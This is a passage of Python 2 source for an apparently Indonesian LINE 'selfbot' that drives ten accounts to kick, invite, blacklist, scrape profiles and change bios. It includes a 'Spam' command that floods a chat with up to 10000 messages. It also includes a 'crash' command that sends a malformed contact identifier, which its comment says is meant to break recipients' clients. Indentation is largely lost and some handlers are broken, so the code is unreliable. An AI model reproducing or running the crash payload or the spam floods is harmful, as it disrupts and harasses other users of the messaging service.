                if op.param2 in admin or op.param2 in Bots:
pass
else:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already")
ki.sendText(msg.to,"already")
kk.sendText(msg.to,"already")
kc.sendText(msg.to,"already")
ks.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"aded")
ki.sendText(msg.to,"aded")
kk.sendText(msg.to,"aded")
kc.sendText(msg.to,"aded")
ks.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"deleted")
ki.sendText(msg.to,"deleted")
kk.sendText(msg.to,"deleted")
kc.sendText(msg.to,"deleted")
ks.sendText(msg.to,"deleted")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
ki.sendText(msg.to,"It is not in the black list")
kk.sendText(msg.to,"It is not in the black list")
kc.sendText(msg.to,"It is not in the black list")
ks.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Key","key"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,Keyowner)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Mimin","mimin"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick ","")
random.choice(KAC).kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
#--------------- SC Add Admin ---------
elif "Admin add @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
cl.sendText(msg.to,"Admin Ditambahkan")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif "Admin remove @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Admin remove @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
cl.sendText(msg.to,"Admin Dihapus")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
elif msg.text in ["Adminlist","adminlist"]:
if admin == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Tunggu...")
mc = "||Admin ✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰||\n=====================\n"
for mi_d in admin:
mc += "••>" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#--------------------------------------
#-------------- Add Friends ------------
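            # "Bot Add @name": every bot account sends a friend add to the group member whose display name matches the mention.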
elif "Bot Add @" in msg.text:
if msg.toType == 2:
if msg.from_ in owner:
print "[Command]Add executing"
_name = msg.text.replace("Bot Add @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
ki.findAndAddContactsByMid(target)
kk.findAndAddContactsByMid(target)
kc.findAndAddContactsByMid(target)
ks.findAndAddContactsByMid(target)
k1.findAndAddContactsByMid(target)
k2.findAndAddContactsByMid(target)
k3.findAndAddContactsByMid(target)
k4.findAndAddContactsByMid(target)
k5.findAndAddContactsByMid(target)
except:
cl.sendText(msg.to,"Error")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Owner Yang bisa Gunain Perintah ini.")
            #-------------= SC AllBio =---------------- Change the bio of every bot. Format => Allbio: WHATEVER YOU LIKE :D
elif "Allbio:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k1.getProfile()
profile.statusMessage = string
k1.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k2.getProfile()
profile.statusMessage = string
k2.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k3.getProfile()
profile.statusMessage = string
k3.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k4.getProfile()
profile.statusMessage = string
k4.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = k5.getProfile()
profile.statusMessage = string
k5.updateProfile(profile)
cl.sendText(msg.to,"Bio berubah menjadi " + string + "")
#--------------=Finish=----------------
            #--------------= SC: change the Owner's display name =--------------
elif "Myname:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Myname:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k1.getProfile()
profile.displayName = string
k1.updateProfile(profile)
k1.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k2.getProfile()
profile.displayName = string
k2.updateProfile(profile)
k2.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k3.getProfile()
profile.displayName = string
k3.updateProfile(profile)
k3.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k4.getProfile()
profile.displayName = string
k4.updateProfile(profile)
k4.sendText(msg.to,"Update Name Menjadi : " + string + "")
profile = k5.getProfile()
profile.displayName = string
k5.updateProfile(profile)
k5.sendText(msg.to,"Update Name Menjadi : " + string + "")
#-------------- copy profile----------
elif "Spam " in msg.text:
                if msg.from_ in admin or msg.from_ in owner:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+ " ","")
tulisan = jmlh * (teks+"\n")
                    # Keke is pretty <3
if txt[1] == "on":
if jmlh <= 10000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of range! ")
elif txt[1] == "off":
if jmlh <= 10000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out of range! ")
#-----------------=Selesai=------------------
elif msg.text in ["Bot?"]: #Ngirim Semua Kontak Bot
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
k1.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Fmid}
k2.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Gmid}
k3.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Hmid}
k4.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Imid}
k5.sendMessage(msg)
#====================================================
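            # "crash": owner-only; sends a contact message carrying a malformed mid, apparently intended to break the receiving client.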
elif msg.text.lower() == "crash":
if msg.from_ in owner:
msg.contentType = 13
msg.contentMetadata = {'mid': "c33b66e4b7709e54a6fe6eced6e57c157',"}
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
#====================================================
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
elif msg.text in ["Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
random.choice(KAC).sendMessage(msg)
elif msg.text in ["All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["Cancel","cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Op cancel","Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
G = ks.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ks.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"No one is inviting")
else:
ks.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ks.sendText(msg.to,"Can not be used outside the group")
else:
ks.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Buka qr","Open qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"QR Sudah Dibuka")
else:
random.choice(KAC).sendText(msg.to,"Sudah Terbuka Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif msg.text in ["Tutup qr","Close qr"]:
if msg.from_ in admin:
if msg.toType == 2:
X = random.choice(KAC).getGroup(msg.to)
X.preventJoinByTicket = True
random.choice(KAC).updateGroup(X)
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Kode QR Sudah Di Tutup")
else:
random.choice(KAC).sendText(msg.to,"Sudah Tertutup Plak")
else:
if wait["lang"] == "JP":
random.choice(KAC).sendText(msg.to,"Can not be used outside the group")
else:
random.choice(KAC).sendText(msg.to,"Not for use less than group")
else:
cl.sendText(msg.to,"Perintah Ditolak.")
cl.sendText(msg.to,"Hanya Admin Yang bisa Gunain Perintah ini.")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif "Info Group" == msg.text:
if msg.toType == 2:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
QR = "Close"
else:
QR = "Open"
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + "[•]" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + "[•]" + gCreator + "\n\n[Group Status]\n" + "[•]Status QR =>" + QR + "\n\n[Group Picture]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\n\nMembers:" + str(len(ginfo.members)) + "\nPending:" + sinvitee)
else:
random.choice(KAC).sendText(msg.to,"[Group Name]\n" + str(ginfo.name) + "\n\n[Group ID]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\n[Group Status]\nGroup Picture:\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "Mid Bot" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
k1.sendText(msg.to,Emid)
k2.sendText(msg.to,Fmid)
k3.sendText(msg.to,Gmid)
k4.sendText(msg.to,Hmid)
k5.sendText(msg.to,Imid)
#--------------------------------- GIFT -------------------------------------
elif msg.text.lower() in ["gift","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': '40ed630f-22d2-4ddd-8999-d64cef5e6c7d',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#----------------------------------------------------------------------------
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
cl.sendMessage(msg)
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Galau"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["You"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Please"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Haaa"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Lol"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
ki.sendMessage(msg)
kk.sendMessage(msg)
elif msg.text in ["TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["Invite:on"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
elif msg.text in ["Bot1 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot2 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv1 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["Bot3 rename "]:
if msg.from_ in admin:
string = msg.text.replace("Cv2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
#==================================================
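            # "lyric <title>": queries the joox lookup endpoint and replies with the title and lyrics of each match.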
            elif 'lyric ' in msg.text.lower():
                if msg.from_ in admin:
                    try:
                        songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
            elif 'wiki ' in msg.text.lower():
                if msg.from_ in admin:
                    try:
                        wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
            elif msg.text.lower() == 'kr restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
            elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
            elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
            elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
            elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
            elif 'instagram ' in msg.text.lower():
                if msg.from_ in admin:
                    try:
                        instagram = msg.text.lower().replace("instagram ","")
html = requests.get('https://www.instagram.com/' + instagram + '/?')
soup = BeautifulSoup(html.text, 'html5lib')
data = soup.find_all('meta', attrs={'property':'og:description'})
text = data[0].get('content').split()
data1 = soup.find_all('meta', attrs={'property':'og:image'})
text1 = data1[0].get('content').split()
user = "Name: " + text[-2] + "\n"
user1 = "Username: " + text[-1] + "\n"
followers = "Followers: " + text[0] + "\n"
following = "Following: " + text[2] + "\n"
post = "Post: " + text[4] + "\n"
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "======INSTAGRAM INFO USER======\n"
details = "\n======INSTAGRAM INFO USER======"
cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
cl.sendImageWithURL(msg.to, text1[0])
except Exception as njer:
cl.sendText(msg.to, str(njer))
            elif 'music ' in msg.text.lower():
                if msg.from_ in admin:
                    try:
                        songname = msg.text.lower().replace('music ','')
                        # The request itself was missing here; reuse the same joox endpoint as the Lyric handler above.
                        params = {'songname': songname}
                        r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
                        data = r.text
                        data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[3])
except Exception as njer:
cl.sendText(msg.to, str(njer))
            elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
            elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
cl.sendText(msg.to,"I pretended to cancel and canceled.")
            elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#===========================================================================
            elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
#============================================================
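            # "ginfo": replies with the group's name, id, creator, member count and pending invites, plus the creator's contact card.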
            elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
            elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
#===========================================================
elif "T-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-eng ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'en')
cl.sendText(msg.to,trs)
print '[Command] Translate EN'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("T-japan ","")
try:
gs = goslate.Goslate()
trs = gs.translate(txt,'ja')
cl.sendText(msg.to,trs)
print '[Command] Translate japan'
except Exception as error:
cl.sendText(msg.to,(error))
elif "T-thai " in msg.text:
if msg.from_ in admin:
